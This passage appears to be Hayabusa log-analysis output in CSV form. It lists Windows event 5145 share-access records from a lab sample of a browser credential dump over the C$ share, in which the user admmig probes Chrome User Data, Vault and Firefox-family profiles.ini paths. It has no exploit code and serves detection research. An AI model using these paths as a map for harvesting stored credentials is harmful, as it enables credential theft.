\\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from 
Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
